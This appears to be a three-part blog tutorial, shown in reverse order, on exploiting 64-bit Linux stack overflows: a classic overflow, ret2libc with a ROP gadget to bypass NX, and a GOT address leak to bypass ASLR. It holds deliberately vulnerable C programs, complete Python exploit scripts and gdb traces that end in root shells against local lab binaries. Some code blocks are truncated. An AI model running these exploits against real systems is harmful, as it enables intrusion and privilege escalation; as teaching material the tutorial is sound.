64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.


The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    return 0;

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
gdb-peda$ c

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 

Let’s see it in action:

# ./poc.py
Enter input:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:

And here it is in action:

# ./poc.py
Enter input:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"

# get a shell
t = telnetlib.Telnet()
t.sock = s

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji@pwnbox:/root/work$ ./poc.py
Enter input:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.


64-bit Linux stack smashing tutorial: Part 2

This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.


The setup is identical to what I was using in part 1. We’ll also be making use of the following:


Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    return 0;

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the function calls a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed in the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are setup correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

  • The address of system(). ASLR is disabled so we don’t have to worry about this address changing.
  • A pointer to “/bin/sh”.
  • Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

Let’s start with finding the address of system(). This is easily done within gdb:

gdb-peda$ start
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>

We can just as easily search for a pointer to “/bin/sh”:

gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
    libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

koji@pwnbox:~/ret2libc$ ropper --file ret2libc --search "% ?di"

0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

3 gadgets found

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

  • Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
  • Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
  • Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

gdb-peda$ br *vuln+73
Breakpoint 1 at 0x40060f

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

gdb-peda$ si
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
   0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()

Step in and RDI should now contain a pointer to “/bin/sh”:

gdb-peda$ si
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
   0x40069e <__libc_csu_init+94>:   pop    r13
   0x4006a0 <__libc_csu_init+96>:   pop    r14
   0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
   0x4006b2:    add    BYTE PTR [rax],al
   0x4006b4 <_fini>:    sub    rsp,0x8
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system()

gdb-peda$ si
   0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
   0x7ffff7a5ac36 <cancel_handler+182>: ret
   0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
   0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
   0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
   0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3

At this point if we just continue execution we should see that “/bin/sh” is executed:

gdb-peda$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

koji@pwnbox:~/ret2libc$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc$ sudo chmod 4755 ret2libc

Now let’s execute our exploit much like we did in part 1:

koji@pwnbox:~/ret2libc$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
No shell for you :(

Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that setup the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

int execve(const char *filename, char *const argv[], char *const envp[]);

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself, that is, don’t look for gadgets in libc.

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.


Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    return 0;

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
